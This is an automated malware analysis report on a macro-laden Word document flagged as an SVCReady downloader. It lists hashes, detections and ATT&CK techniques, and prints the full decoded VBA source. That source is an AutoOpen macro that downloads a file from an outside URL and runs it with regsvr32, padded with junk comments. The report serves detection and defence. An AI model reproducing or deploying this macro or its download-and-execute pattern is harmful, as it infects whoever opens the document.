Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 47cae2f886381370…

MALICIOUS

Office (OOXML)

147.6 KB Created: 2020-07-08 23:42:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: 1ba37d065e4cad9c85808d23e4b52975 SHA-1: 1e8f592db3fed8be64050090b41d1f8b99f347b6 SHA-256: 47cae2f88638137023618f35138504964f5bb45d2d47e8e8a63af6362605f130
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The AutoOpen macro is present and calls URLDownloadToFile to download a file from 'http://9ygw2.com/iz5/yaca.php?l=kpt2.cab' and save it as 'o.tmp'. This indicates the document is a downloader for a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Downloader.SVCReady-81fe832081fe7c7c-9951593-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-81fe832081fe7c7c-9951593-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    ' Stupefaction returning usa
Call URLDownloadToFile(0, "http://9ygw2.com/iz5/yaca.php?l=kpt2.cab", Vw, 0, 0)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Const Vw As String = "o.tmp"
Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://9ygw2.com/iz5/yaca.php?l=kpt2.cab Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2393 bytes
SHA-256: 0721f6476f39147e16accd4f3c1f2abfedcd900ea732833b2ef11a0545f32463
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "E"
Public Const Vw As String = "o.tmp"
Sub autoopen()

' Differential media cartoon lithuania
' Gotten granary lazily abridged
' Whiten fall
' Downtown rueful noisome
' Life-size survive pet hamburg
' Grooves advantage incandescent

' Vitals mockingly pane lapland
' Unhealthy florence nakedness comics
' Biography
' Hammer genetics
' Stupefaction returning usa
Call URLDownloadToFile(0, "http://9ygw2.com/iz5/yaca.php?l=kpt2.cab", Vw, 0, 0)

' Amounts hopkins potentate institutions
' Configured inert vicarage
' Allocated pubs reflection ladder single
' Rimini trails
P
End Sub

Attribute VB_Name = "E1"
Sub P()

' Hay essayist
' Reader quicken jh evolution weaver
' Reg settled indelible
' Generic chan liberalism mitsubishi

' Kith sweater
' Noted desirable brighton
' Hughes random dose
' Overturn epistolary
' Installing commentator applaud mutual stage primacy
' Johnny apple isolated stating

' Arc nhl
' Sock mauve scanned
' Vaunt locked associating eminem availability
' Rides quality hub

' Sensational sinuous
' Push edinburgh
' Combine dialectic plover

' Fatten discussed constitution institutional credible
' Obnoxious clocks

' Internal

' Tab usefully
' Puts uniform
' Pigment admissible dropped older wearisome
' Tawdry britain discourteous

' Nee interpretation eligibility
' Profession isolated sim ci scowl stretcher
' Offensive convex
' Corporeal cage prove
Dim R As New WshShell

' Imagination amethyst nonprofit gba hackneyed
' Charlie tepid
' Brunette buzzard
' Testator
' Freemen depress inexorably
R.run "regs" + "vr32 " & Vw
End Sub

Attribute VB_Name = "g"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal id As LongPtr, ByVal cI As String, ByVal BZ As String, ByVal i As LongPtr, ByVal gi As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal id As Long, ByVal cI As String, ByVal BZ As String, ByVal i As Long, ByVal gi As Long) As Long
#End If
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 19968 bytes
SHA-256: 0cf02f71cfdc1d17e36adcd45258dc34208be5b583df07b57c063f41a1826f8f

Open this report in the interactive analyzer, or submit your own file for analysis.